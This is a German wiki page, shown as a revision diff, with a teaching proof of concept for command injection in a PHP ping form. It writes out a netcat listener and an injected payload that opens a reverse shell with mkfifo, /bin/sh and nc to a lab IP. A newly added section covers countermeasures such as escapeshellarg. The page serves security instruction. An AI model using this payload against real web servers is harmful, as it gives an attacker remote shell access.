Command Injection Proof of Concept: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 14: Zeile 14:
 
=Auf dem Angreifer=
 
=Auf dem Angreifer=
 
[[Datei:Command-injetion2.png]]
 
[[Datei:Command-injetion2.png]]
 +
 +
=Gegenmassnahmen=
 +
*Niemals Daten von Aussen ungeprüft in Anwendungen verwenden.
 +
*Verwendung von entsprechenden Funktionen der benutzten Programmiersprache / Scriptsprache.
 +
*PHP-Funktion escapeshellarg zur Maskierung einer Zeichenkette zur weiteren Verwendung als Shell-Argument:
 +
$cmd = 'ping -c 4 ' . escapeshellarg($ip);
 +
**
 +
ping -c 4 '1.1.1.1;  ls'

Version vom 28. Juni 2021, 07:54 Uhr

PHP Code

  • Bei dieser Anwendung wird die Eingabe nicht verifiziert.
  • Man hinter die IP Adresse mit einem Semikolon weitere Kommandos anhängen.
  • Diese Kommandos werden dann mit den Rechten des Webservers ausgeführt.
  • In diesem Fall führen wir eine Remote Shell aus.

Command-injection.png

Angreifer

  • netcat -lp 8668

Schadcode einbringen

  • 1.1.1.1 ; mkfifo /tmp/backpipe ; /bin/sh 0</tmp/backpipe | nc 10.0.10.101 8668 1>/tmp/backpipe

Command-injetion1.png

Auf dem Angreifer

Command-injetion2.png

Gegenmassnahmen

  • Niemals Daten von Aussen ungeprüft in Anwendungen verwenden.
  • Verwendung von entsprechenden Funktionen der benutzten Programmiersprache / Scriptsprache.
  • PHP-Funktion escapeshellarg zur Maskierung einer Zeichenkette zur weiteren Verwendung als Shell-Argument:
$cmd = 'ping -c 4 ' . escapeshellarg($ip);
**
ping -c 4 '1.1.1.1;  ls'